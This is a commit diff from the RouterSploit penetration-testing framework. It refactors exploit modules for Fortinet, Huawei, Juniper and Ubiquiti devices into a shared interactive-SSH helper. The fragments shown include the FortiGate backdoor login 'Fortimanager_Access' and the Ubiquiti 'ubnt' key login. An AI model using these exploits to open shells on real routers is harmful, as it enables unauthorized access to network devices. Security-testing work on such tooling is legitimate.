Adding ssh_interactive to modules

b523b783 · Marcin Bury · a69bee88 · b523b783 · b523b783 · b523b783
Commit b523b783 authored Jul 10, 2016 by Marcin Bury
5 changed files
--- a/routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py
+++ b/routersploit/modules/exploits/fortinet/fortigate_os_backdoor.py
-import socket
-import select
 import paramiko
 import base64
 import hashlib
-import termios
-import tty
-import sys
-from paramiko.py3compat import u

 from routersploit import (
    exploits,
@@ -14,6 +8,7 @@ from routersploit import (
    print_error,
    print_status,
    mute,
+    ssh_interactive,
 )


@@ -65,39 +60,13 @@ class Exploit(exploits.Exploit):

        try:
            trans.auth_interactive(username='Fortimanager_Access', handler=self.custom_handler)
-            chan = client.invoke_shell()
+
+            print_success("Exploit succeeded")
+            ssh_interactive(client)
        except:
            print_error("Exploit failed")
            return

-        print_success("Exploit succeeded")
-        oldtty = termios.tcgetattr(sys.stdin)
-        try:
-            tty.setraw(sys.stdin.fileno())
-            tty.setcbreak(sys.stdin.fileno())
-            chan.settimeout(0.0)
-
-            while True:
-                r, w, e = select.select([chan, sys.stdin], [], [])
-                if chan in r:
-                    try:
-                        x = u(chan.recv(1024))
-                        if len(x) == 0:
-                            sys.stdout.write('\r\n*** EOF\r\n')
-                            break
-                        sys.stdout.write(x)
-                        sys.stdout.flush()
-                    except socket.timeout:
-                        pass
-                if sys.stdin in r:
-                    x = sys.stdin.read(1)
-                    if len(x) == 0:
-                        break
-                    chan.send(x)
-
-        finally:
-            termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
-
    @mute
    def check(self):
        client = paramiko.SSHClient()

--- a/routersploit/modules/exploits/huawei/hg630a_default_creds.py
+++ b/routersploit/modules/exploits/huawei/hg630a_default_creds.py
-import paramiko, termios, tty, sys, select, socket
+import paramiko

 from routersploit import (
    exploits,
@@ -6,6 +6,7 @@ from routersploit import (
    print_error,
    print_success,
    mute,
+    ssh_interactive,
 )


@@ -44,41 +45,7 @@ class Exploit(exploits.Exploit):
            return
        else:
            print_success("SSH - Successful authentication")
-
-            chan = ssh.invoke_shell()
-            oldtty = termios.tcgetattr(sys.stdin)
-            try:
-                tty.setraw(sys.stdin.fileno())
-                tty.setcbreak(sys.stdin.fileno())
-                chan.settimeout(0.0)
-
-                while(True):
-                    r, w, e = select.select([chan, sys.stdin], [], [])
-                    if(chan in r):
-                        try:
-                            x = unicode(chan.recv(1024))
-
-                            if(len(x) == 0):
-                                sys.stdout.write('\r\nExiting...\r\n')
-                                break
-
-                            sys.stdout.write(x)
-                            sys.stdout.flush()
-
-                        except socket.timeout:
-                            pass
-
-                    if(sys.stdin in r):
-                        x = sys.stdin.read(1)
-
-                        if(len(x) == 0):
-                            break
-
-                        chan.send(x)
-
-            finally:
-                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
-                return 
+            ssh_interactive(ssh)

    @mute
    def check(self):

--- a/routersploit/modules/exploits/juniper/screenos_backdoor.py
+++ b/routersploit/modules/exploits/juniper/screenos_backdoor.py
 import telnetlib
-import paramiko, StringIO, termios, tty, sys, select, socket
+import paramiko

 from routersploit import (
    exploits,
    print_success,
    print_error,
    mute,
+    ssh_interactive,
 )


@@ -45,40 +46,7 @@ class Exploit(exploits.Exploit):
            ssh.close()
        else:
            print_success("SSH - Successful authentication")
-
-            chan = ssh.invoke_shell()
-            oldtty = termios.tcgetattr(sys.stdin)
-            try:
-                tty.setraw(sys.stdin.fileno())
-                tty.setcbreak(sys.stdin.fileno())
-                chan.settimeout(0.0)
-
-                while(True):
-                    r, w, e = select.select([chan, sys.stdin], [], [])
-                    if(chan in r):
-                        try:
-                            x = unicode(chan.recv(1024))
-
-                            if(len(x) == 0):
-                                sys.stdout.write('\r\nExiting...\r\n')
-                                break
-
-                            sys.stdout.write(x)
-                            sys.stdout.flush()
-
-                        except socket.timeout:
-                            pass
-
-                    if(sys.stdin in r):
-                        x = sys.stdin.read(1)
-
-                        if(len(x) == 0):
-                            break
-
-                        chan.send(x)
-
-            finally:
-                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+            ssh_interactive(ssh)
            return

        try:

--- a/routersploit/modules/exploits/multi/ssh_auth_keys.py
+++ b/routersploit/modules/exploits/multi/ssh_auth_keys.py
-import paramiko, StringIO, termios, tty, sys, select, socket
+import paramiko
+import StringIO

 from routersploit import (
    exploits,

--- a/routersploit/modules/exploits/ubiquiti/airos_6_x.py
+++ b/routersploit/modules/exploits/ubiquiti/airos_6_x.py
 import tempfile
 import StringIO
-import termios
-import tty
-import sys
-import select
-import socket
-
 import paramiko

 from routersploit import (
@@ -16,6 +10,7 @@ from routersploit import (
    http_request,
    mute,
    validators,
+    ssh_interactive,
 )


@@ -77,46 +72,14 @@ class Exploit(exploits.Exploit):
            pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
            pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
            pseudo_privkey_file.close()
+            private_key.close()

            ip_target = self.target.replace('https://', '')
            ip_target = ip_target.replace('http://', '')
            ip_target = ip_target.replace('/', '')

            client.connect(ip_target, 22, username='ubnt', pkey=pkey)
-
-            # invoking interactive shell
-            chan = client.invoke_shell()
-            oldtty = termios.tcgetattr(sys.stdin)
-
-            try:
-                tty.setraw(sys.stdin.fileno())
-                tty.setcbreak(sys.stdin.fileno())
-                chan.settimeout(0.0)
-
-                while True:
-                    r, w, e = select.select([chan, sys.stdin], [], [])
-                    if chan in r:
-                        try:
-                            x = unicode(chan.recv(1024))
-
-                            if len(x) == 0:
-                                sys.stdout.write('\r\nExiting...\r\n')
-                                break
-
-                            sys.stdout.write(x)
-                            sys.stdout.flush()
-
-                        except socket.timeout:
-                            pass
-
-                    if sys.stdin in r:
-                        x = sys.stdin.read(1)
-                        if len(x) == 0:
-                            break
-                        chan.send(x)
-            finally:
-                termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
-                private_key.close()
+            ssh_interactive(client)

        else:
            print_error('Target is not vulnerable')